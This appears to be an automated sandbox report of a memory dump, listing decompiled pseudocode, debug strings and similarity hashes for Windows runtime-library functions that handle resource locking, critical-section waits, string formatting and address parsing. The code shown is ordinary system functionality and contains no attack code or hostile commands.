                    0x020d53ce
                    0x020d53d0
                    0x020d53d4
                    0x020d53d6
                    0x00000000
                    0x020d53d8
                    0x020d53e3
                    0x020d53ea
                    0x020d53ea
                    0x00000000
                    0x020d53d6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x021122b6
                    0x00000000
                    0x0211228f
                    0x02112349
                    0x0211234d
                    0x02112251
                    0x02112251
                    0x00000000
                    0x02112251
                    0x021121a4
                    0x021121a4
                    0x021121a6
                    0x021121a8
                    0x021121ac
                    0x021121b6
                    0x021121b8
                    0x021121bc
                    0x021121be
                    0x00000000
                    0x00000000
                    0x021121c0
                    0x021121c2
                    0x021121c4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x021121c4
                    0x021121c6
                    0x021121c6
                    0x021121c8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x021121c8
                    0x021121a2
                    0x00000000
                    0x02112183
                    0x020f057b
                    0x020f057d
                    0x020f0581
                    0x020f0583
                    0x02112178
                    0x00000000
                    0x020f0589
                    0x020f058f
                    0x020f058f
                    0x020f0583
                    0x00000000

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02112206
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 885266447-4236105082
                    • Opcode ID: 8dfa758eeaf8a03b1cd7b6d46286128d91becaffe0def891d61729d5792fee6d
                    • Instruction ID: be7253778e1d9328c9c9b6a3b8262088db2d6b753e4f4cb0bcefcc8555bf9e65
                    • Opcode Fuzzy Hash: 8dfa758eeaf8a03b1cd7b6d46286128d91becaffe0def891d61729d5792fee6d
                    • Instruction Fuzzy Hash: E15109717803216FEB25CA18CCC1FA673AAAF88724F214269ED55DF285DB71EC418B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E020F14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                    				signed int _v8;
                    				char _v10;
                    				char _v140;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t24;
                    				void* _t26;
                    				signed int _t29;
                    				signed int _t34;
                    				signed int _t40;
                    				intOrPtr _t45;
                    				void* _t51;
                    				intOrPtr* _t52;
                    				void* _t54;
                    				signed int _t57;
                    				void* _t58;
                    
                    				_t51 = __edx;
                    				_t24 =  *0x2192088; // 0x777117bf
                    				_v8 = _t24 ^ _t57;
                    				_t45 = _a16;
                    				_t53 = _a4;
                    				_t52 = _a20;
                    				if(_a4 == 0 || _t52 == 0) {
                    					L10:
                    					_t26 = 0xc000000d;
                    				} else {
                    					if(_t45 == 0) {
                    						if( *_t52 == _t45) {
                    							goto L3;
                    						} else {
                    							goto L10;
                    						}
                    					} else {
                    						L3:
                    						_t28 =  &_v140;
                    						if(_a12 != 0) {
                    							_push("[");
                    							_push(0x41);
                    							_push( &_v140);
                    							_t29 = E020E7707();
                    							_t58 = _t58 + 0xc;
                    							_t28 = _t57 + _t29 * 2 - 0x88;
                    						}
                    						_t54 = E020F13CB(_t53, _t28);
                    						if(_a8 != 0) {
                    							_t34 = E020E7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                    							_t58 = _t58 + 0x10;
                    							_t54 = _t54 + _t34 * 2;
                    						}
                    						if(_a12 != 0) {
                    							_t40 = E020E7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                    							_t58 = _t58 + 0x10;
                    							_t54 = _t54 + _t40 * 2;
                    						}
                    						_t53 = (_t54 -  &_v140 >> 1) + 1;
                    						 *_t52 = _t53;
                    						if( *_t52 < _t53) {
                    							goto L10;
                    						} else {
                    							E020B2340(_t45,  &_v140, _t53 + _t53);
                    							_t26 = 0;
                    						}
                    					}
                    				}
                    				return E020BE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                    			}





















                    APIs
                    • ___swprintf_l.LIBCMT ref: 0211EA22
                      • Part of subcall function 020F13CB: ___swprintf_l.LIBCMT ref: 020F146B
                      • Part of subcall function 020F13CB: ___swprintf_l.LIBCMT ref: 020F1490
                    • ___swprintf_l.LIBCMT ref: 020F156D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: %%%u$]:%u
                    • API String ID: 48624451-3050659472
                    • Opcode ID: 6d41a792fb3e0979a8ee96fe47659895291898042c975c0657ffd23c2d0b19e1
                    • Instruction ID: 540c9c4d2d3de464a6b1d186d4dd877d2f46c0818e5861d44fd8c801678c6718
                    • Opcode Fuzzy Hash: 6d41a792fb3e0979a8ee96fe47659895291898042c975c0657ffd23c2d0b19e1
                    • Instruction Fuzzy Hash: 0E21C372940319EBDF61DE94CC41AEEB3ADAF10B04F444425EE4AE3140DB70AA589BE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 45%
                    			E020D53A5(signed int _a4, char _a8) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t32;
                    				signed int _t37;
                    				signed int _t40;
                    				signed int _t42;
                    				void* _t45;
                    				intOrPtr _t46;
                    				void* _t48;
                    				signed int _t49;
                    				void* _t51;
                    				signed int _t57;
                    				signed int _t64;
                    				signed int _t71;
                    				void* _t74;
                    				intOrPtr _t78;
                    				signed int* _t79;
                    				void* _t85;
                    				signed int _t86;
                    				signed int _t92;
                    				void* _t104;
                    				void* _t105;
                    
                    				_t64 = _a4;
                    				_t32 =  *(_t64 + 0x28);
                    				_t71 = _t64 + 0x28;
                    				_push(_t92);
                    				if(_t32 < 0) {
                    					_t78 =  *[fs:0x18];
                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                    						goto L3;
                    					} else {
                    						__eflags = _t32 | 0xffffffff;
                    						asm("lock xadd [ecx], eax");
                    						return 1;
                    					}
                    				} else {
                    					L3:
                    					_push(_t86);
                    					while(1) {
                    						L4:
                    						__eflags = _t32;
                    						if(_t32 == 0) {
                    							break;
                    						}
                    						__eflags = _a8;
                    						if(_a8 == 0) {
                    							__eflags = 0;
                    							return 0;
                    						} else {
                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                    							_t79 = _t64 + 0x24;
                    							_t71 = 1;
                    							asm("lock xadd [eax], ecx");
                    							_t32 =  *(_t64 + 0x28);
                    							_a4 = _t32;
                    							__eflags = _t32;
                    							if(_t32 != 0) {
                    								L19:
                    								_t86 = 0;
                    								__eflags = 0;
                    								while(1) {
                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                    									asm("sbb esi, esi");
                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x021901c0;
                    									_push(_t92);
                    									_push(0);
                    									_t37 = E020AF8CC( *((intOrPtr*)(_t64 + 0x20)));
                    									__eflags = _t37 - 0x102;
                    									if(_t37 != 0x102) {
                    										break;
                    									}
                    									_t71 =  *(_t92 + 4);
                    									_t85 =  *_t92;
                    									_t51 = E020F4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                    									_push(_t85);
                    									_push(_t51);
                    									E02103F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                    									E02103F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                    									_t86 = _t86 + 1;
                    									_t105 = _t104 + 0x28;
                    									__eflags = _t86 - 2;
                    									if(__eflags > 0) {
                    										E0213217A(_t71, __eflags, _t64);
                    									}
                    									_push("RTL: Re-Waiting\n");
                    									_push(0);
                    									_push(0x65);
                    									E02103F92();
                    									_t104 = _t105 + 0xc;
                    								}
                    								__eflags = _t37;
                    								if(__eflags < 0) {
                    									_push(_t37);
                    									E020F3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                    									asm("int3");
                    									_t40 =  *_t71;
                    									 *_t71 = 0;
                    									__eflags = _t40;
                    									if(_t40 == 0) {
                    										L1:
                    										_t42 = E020D5384(_t92 + 0x24);
                    										if(_t42 != 0) {
                    											goto L31;
                    										} else {
                    											goto L2;
                    										}
                    									} else {
                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                    										_push( &_a4);
                    										_push(_t40);
                    										_t49 = E020AF970( *((intOrPtr*)(_t92 + 0x18)));
                    										__eflags = _t49;
                    										if(__eflags >= 0) {
                    											goto L1;
                    										} else {
                    											_push(_t49);
                    											E020F3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                    											L31:
                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                    											_push( &_a4);
                    											_push(1);
                    											_t42 = E020AF970( *((intOrPtr*)(_t92 + 0x20)));
                    											__eflags = _t42;
                    											if(__eflags >= 0) {
                    												L2:
                    												return _t42;
                    											} else {
                    												_push(_t42);
                    												E020F3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                    												_push( &_a4);
                    												_push(1);
                    												_t42 = E020AF970( *((intOrPtr*)(_t92 + 0x20)));
                    												__eflags = _t42;
                    												if(__eflags >= 0) {
                    													goto L2;
                    												} else {
                    													_push(_t42);
                    													_t45 = E020F3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                    													asm("int3");
                    													while(1) {
                    														_t74 = _t45;
                    														__eflags = _t45 - 1;
                    														if(_t45 != 1) {
                    															break;
                    														}
                    														_t86 = _t86 | 0xffffffff;
                    														_t45 = _t74;
                    														asm("lock cmpxchg [ebx], edi");
                    														__eflags = _t45 - _t74;
                    														if(_t45 != _t74) {
                    															continue;
                    														} else {
                    															_t46 =  *[fs:0x18];
                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                    															return _t46;
                    														}
                    														goto L38;
                    													}
                    													E020D5329(_t74, _t92);
                    													_push(1);
                    													_t48 = E020D53A5(_t92);
                    													return _t48;
                    												}
                    											}
                    										}
                    									}
                    								} else {
                    									_t32 =  *(_t64 + 0x28);
                    									continue;
                    								}
                    							} else {
                    								_t71 =  *_t79;
                    								__eflags = _t71;
                    								if(__eflags > 0) {
                    									while(1) {
                    										_t57 = _t71;
                    										asm("lock cmpxchg [edi], esi");
                    										__eflags = _t57 - _t71;
                    										if(_t57 == _t71) {
                    											break;
                    										}
                    										_t71 = _t57;
                    										__eflags = _t57;
                    										if(_t57 > 0) {
                    											continue;
                    										}
                    										break;
                    									}
                    									_t32 = _a4;
                    									__eflags = _t71;
                    								}
                    								if(__eflags != 0) {
                    									continue;
                    								} else {
                    									goto L19;
                    								}
                    							}
                    						}
                    						goto L38;
                    					}
                    					_t71 = _t71 | 0xffffffff;
                    					_t32 = 0;
                    					asm("lock cmpxchg [edx], ecx");
                    					__eflags = 0;
                    					if(0 != 0) {
                    						goto L4;
                    					} else {
                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                    						return 1;
                    					}
                    				}
                    				L38:
                    			}



























                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021122F4
                    Strings
                    • RTL: Re-Waiting, xrefs: 02112328
                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 021122FC
                    • RTL: Resource at %p, xrefs: 0211230B
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 885266447-871070163
                    • Opcode ID: 1f2f194b370980d11dd94a55348ed10d74dcbcd5251b638d7b407212637080ab
                    • Instruction ID: e5d503eeaff2d5d2c48a5febbbce7a3080bdf8ba6336ffb9e1787967dded85a5
                    • Opcode Fuzzy Hash: 1f2f194b370980d11dd94a55348ed10d74dcbcd5251b638d7b407212637080ab
                    • Instruction Fuzzy Hash: 235108716417126BEB15DB28CCC0FE77799EF48324F104229FD15DB680EB71E8419BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 51%
                    			E020DEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				signed int _v24;
                    				intOrPtr* _v28;
                    				intOrPtr _v32;
                    				signed int _v36;
                    				intOrPtr _v40;
                    				short _v66;
                    				char _v72;
                    				void* __esi;
                    				intOrPtr _t38;
                    				intOrPtr _t39;
                    				signed int _t40;
                    				intOrPtr _t42;
                    				intOrPtr _t43;
                    				signed int _t44;
                    				void* _t46;
                    				intOrPtr _t48;
                    				signed int _t49;
                    				intOrPtr _t50;
                    				intOrPtr _t53;
                    				signed char _t67;
                    				void* _t72;
                    				intOrPtr _t77;
                    				intOrPtr* _t80;
                    				intOrPtr _t84;
                    				intOrPtr* _t85;
                    				void* _t91;
                    				void* _t92;
                    				void* _t93;
                    
                    				_t80 = __edi;
                    				_t75 = __edx;
                    				_t70 = __ecx;
                    				_t84 = _a4;
                    				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                    					E020CDA92(__ecx, __edx, __eflags, _t84);
                    					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                    				}
                    				_push(0);
                    				__eflags = _t38 - 0xffffffff;
                    				if(_t38 == 0xffffffff) {
                    					_t39 =  *0x219793c; // 0x0
                    					_push(0);
                    					_push(_t84);
                    					_t40 = E020B16C0(_t39);
                    				} else {
                    					_t40 = E020AF9D4(_t38);
                    				}
                    				_pop(_t85);
                    				__eflags = _t40;
                    				if(__eflags < 0) {
                    					_push(_t40);
                    					E020F3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                    					asm("int3");
                    					while(1) {
                    						L21:
                    						_t76 =  *[fs:0x18];
                    						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                    						__eflags =  *(_t42 + 0x240) & 0x00000002;
                    						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                    							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                    							_v66 = 0x1722;
                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                    							_t76 =  &_v72;
                    							_push( &_v72);
                    							_v28 = _t85;
                    							_v40 =  *((intOrPtr*)(_t85 + 4));
                    							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                    							_push(0x10);
                    							_push(0x20402);
                    							E020B01A4( *0x7ffe0382 & 0x000000ff);
                    						}
                    						while(1) {
                    							_t43 = _v8;
                    							_push(_t80);
                    							_push(0);
                    							__eflags = _t43 - 0xffffffff;
                    							if(_t43 == 0xffffffff) {
                    								_t71 =  *0x219793c; // 0x0
                    								_push(_t85);
                    								_t44 = E020B1F28(_t71);
                    							} else {
                    								_t44 = E020AF8CC(_t43);
                    							}
                    							__eflags = _t44 - 0x102;
                    							if(_t44 != 0x102) {
                    								__eflags = _t44;
                    								if(__eflags < 0) {
                    									_push(_t44);
                    									E020F3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                    									asm("int3");
                    									E02132306(_t85);
                    									__eflags = _t67 & 0x00000002;
                    									if((_t67 & 0x00000002) != 0) {
                    										_t7 = _t67 + 2; // 0x4
                    										_t72 = _t7;
                    										asm("lock cmpxchg [edi], ecx");
                    										__eflags = _t67 - _t67;
                    										if(_t67 == _t67) {
                    											E020DEC56(_t72, _t76, _t80, _t85);
                    										}
                    									}
                    									return 0;
                    								} else {
                    									__eflags = _v24;
                    									if(_v24 != 0) {
                    										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                    									}
                    									return 2;
                    								}
                    								goto L36;
                    							}
                    							_t77 =  *((intOrPtr*)(_t80 + 4));
                    							_push(_t67);
                    							_t46 = E020F4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                    							_push(_t77);
                    							E02103F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                    							_t48 =  *_t85;
                    							_t92 = _t91 + 0x18;
                    							__eflags = _t48 - 0xffffffff;
                    							if(_t48 == 0xffffffff) {
                    								_t49 = 0;
                    								__eflags = 0;
                    							} else {
                    								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                    							}
                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                    							_push(_t49);
                    							_t50 = _v12;
                    							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                    							_push(_t85);
                    							_push( *((intOrPtr*)(_t85 + 0xc)));
                    							_push( *((intOrPtr*)(_t50 + 0x24)));
                    							E02103F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                    							_t53 =  *_t85;
                    							_t93 = _t92 + 0x20;
                    							_t67 = _t67 + 1;
                    							__eflags = _t53 - 0xffffffff;
                    							if(_t53 != 0xffffffff) {
                    								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                    								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                    							}
                    							__eflags = _t67 - 2;
                    							if(_t67 > 2) {
                    								__eflags = _t85 - 0x21920c0;
                    								if(_t85 != 0x21920c0) {
                    									_t76 = _a4;
                    									__eflags = _a4 - _a8;
                    									if(__eflags == 0) {
                    										E0213217A(_t71, __eflags, _t85);
                    									}
                    								}
                    							}
                    							_push("RTL: Re-Waiting\n");
                    							_push(0);
                    							_push(0x65);
                    							_a8 = _a4;
                    							E02103F92();
                    							_t91 = _t93 + 0xc;
                    							__eflags =  *0x7ffe0382;
                    							if( *0x7ffe0382 != 0) {
                    								goto L21;
                    							}
                    						}
                    						goto L36;
                    					}
                    				} else {
                    					return _t40;
                    				}
                    				L36:
                    			}

                    Strings
                    • RTL: Re-Waiting, xrefs: 021124FA
                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 021124BD
                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0211248D
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID:
                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                    • API String ID: 0-3177188983
                    • Opcode ID: 0fcceab1695c2fd2acbcf40e103df6bddd3f48d671057ae72225ab7657853774
                    • Instruction ID: cc5c3fb0341172c0ad6620dfacc2f767621e59453ecf592d90c3eb90ae6dec62
                    • Opcode Fuzzy Hash: 0fcceab1695c2fd2acbcf40e103df6bddd3f48d671057ae72225ab7657853774
                    • Instruction Fuzzy Hash: 9941D570640314AFD724DB68CC89FAB77BAEF44320F208A15FA699B6C1D734E941DB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E020EFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _t105;
                    				void* _t110;
                    				char _t114;
                    				short _t115;
                    				void* _t118;
                    				signed short* _t119;
                    				short _t120;
                    				char _t122;
                    				void* _t127;
                    				void* _t130;
                    				signed int _t136;
                    				intOrPtr _t143;
                    				signed int _t158;
                    				signed short* _t164;
                    				signed int _t167;
                    				void* _t170;
                    
                    				_t158 = 0;
                    				_t164 = _a4;
                    				_v20 = 0;
                    				_v24 = 0;
                    				_v8 = 0;
                    				_v12 = 0;
                    				_v16 = 0;
                    				_v28 = 0;
                    				_t136 = 0;
                    				while(1) {
                    					_t167 =  *_t164 & 0x0000ffff;
                    					if(_t167 == _t158) {
                    						break;
                    					}
                    					_t118 = _v20 - _t158;
                    					if(_t118 == 0) {
                    						if(_t167 == 0x3a) {
                    							if(_v12 > _t158 || _v8 > _t158) {
                    								break;
                    							} else {
                    								_t119 =  &(_t164[1]);
                    								if( *_t119 != _t167) {
                    									break;
                    								}
                    								_t143 = 2;
                    								 *((short*)(_a12 + _t136 * 2)) = 0;
                    								_v28 = 1;
                    								_v8 = _t143;
                    								_t136 = _t136 + 1;
                    								L47:
                    								_t164 = _t119;
                    								_v20 = _t143;
                    								L14:
                    								if(_v24 == _t158) {
                    									L19:
                    									_t164 =  &(_t164[1]);
                    									_t158 = 0;
                    									continue;
                    								}
                    								if(_v12 == _t158) {
                    									if(_v16 > 4) {
                    										L29:
                    										return 0xc000000d;
                    									}
                    									_t120 = E020EEE02(_v24, _t158, 0x10);
                    									_t170 = _t170 + 0xc;
                    									 *((short*)(_a12 + _t136 * 2)) = _t120;
                    									_t136 = _t136 + 1;
                    									goto L19;
                    								}
                    								if(_v16 > 3) {
                    									goto L29;
                    								}
                    								_t122 = E020EEE02(_v24, _t158, 0xa);
                    								_t170 = _t170 + 0xc;
                    								if(_t122 > 0xff) {
                    									goto L29;
                    								}
                    								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                    								goto L19;
                    							}
                    						}
                    						L21:
                    						if(_v8 > 7 || _t167 >= 0x80) {
                    							break;
                    						} else {
                    							if(E020E685D(_t167, 4) == 0) {
                    								if(E020E685D(_t167, 0x80) != 0) {
                    									if(_v12 > 0) {
                    										break;
                    									}
                    									_t127 = 1;
                    									_a7 = 1;
                    									_v24 = _t164;
                    									_v20 = 1;
                    									_v16 = 1;
                    									L36:
                    									if(_v20 == _t127) {
                    										goto L19;
                    									}
                    									_t158 = 0;
                    									goto L14;
                    								}
                    								break;
                    							}
                    							_a7 = 0;
                    							_v24 = _t164;
                    							_v20 = 1;
                    							_v16 = 1;
                    							goto L19;
                    						}
                    					}
                    					_t130 = _t118 - 1;
                    					if(_t130 != 0) {
                    						if(_t130 == 1) {
                    							goto L21;
                    						}
                    						_t127 = 1;
                    						goto L36;
                    					}
                    					if(_t167 >= 0x80) {
                    						L7:
                    						if(_t167 == 0x3a) {
                    							_t158 = 0;
                    							if(_v12 > 0 || _v8 > 6) {
                    								break;
                    							} else {
                    								_t119 =  &(_t164[1]);
                    								if( *_t119 != _t167) {
                    									_v8 = _v8 + 1;
                    									L13:
                    									_v20 = _t158;
                    									goto L14;
                    								}
                    								if(_v28 != 0) {
                    									break;
                    								}
                    								_v28 = _v8 + 1;
                    								_t143 = 2;
                    								_v8 = _v8 + _t143;
                    								goto L47;
                    							}
                    						}
                    						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                    							break;
                    						} else {
                    							_v12 = _v12 + 1;
                    							_t158 = 0;
                    							goto L13;
                    						}
                    					}
                    					if(E020E685D(_t167, 4) != 0) {
                    						_v16 = _v16 + 1;
                    						goto L19;
                    					}
                    					if(E020E685D(_t167, 0x80) != 0) {
                    						_v16 = _v16 + 1;
                    						if(_v12 > 0) {
                    							break;
                    						}
                    						_a7 = 1;
                    						goto L19;
                    					}
                    					goto L7;
                    				}
                    				 *_a8 = _t164;
                    				if(_v12 != 0) {
                    					if(_v12 != 3) {
                    						goto L29;
                    					}
                    					_v8 = _v8 + 1;
                    				}
                    				if(_v28 != 0 || _v8 == 7) {
                    					if(_v20 != 1) {
                    						if(_v20 != 2) {
                    							goto L29;
                    						}
                    						 *((short*)(_a12 + _t136 * 2)) = 0;
                    						L65:
                    						_t105 = _v28;
                    						if(_t105 != 0) {
                    							_t98 = (_t105 - _v8) * 2; // 0x11
                    							E020C8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                    							_t110 = 8;
                    							E020BDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                    						}
                    						return 0;
                    					}
                    					if(_v12 != 0) {
                    						if(_v16 > 3) {
                    							goto L29;
                    						}
                    						_t114 = E020EEE02(_v24, 0, 0xa);
                    						_t170 = _t170 + 0xc;
                    						if(_t114 > 0xff) {
                    							goto L29;
                    						}
                    						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                    						goto L65;
                    					}
                    					if(_v16 > 4) {
                    						goto L29;
                    					}
                    					_t115 = E020EEE02(_v24, 0, 0x10);
                    					_t170 = _t170 + 0xc;
                    					 *((short*)(_a12 + _t136 * 2)) = _t115;
                    					goto L65;
                    				} else {
                    					goto L29;
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: __fassign
                    • String ID:
                    • API String ID: 3965848254-0
                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                    • Instruction ID: 9a4ca070c0ed9bbcf2bba79b13e41de82560de5028b8313f6a6d13296ce437e2
                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                    • Instruction Fuzzy Hash: A391B031D0030AEEDF25DF98C8497EEBBB5EF45318F20807AD816A7691E7705A81DB81
                    Uniqueness

                    Uniqueness Score: -1.00%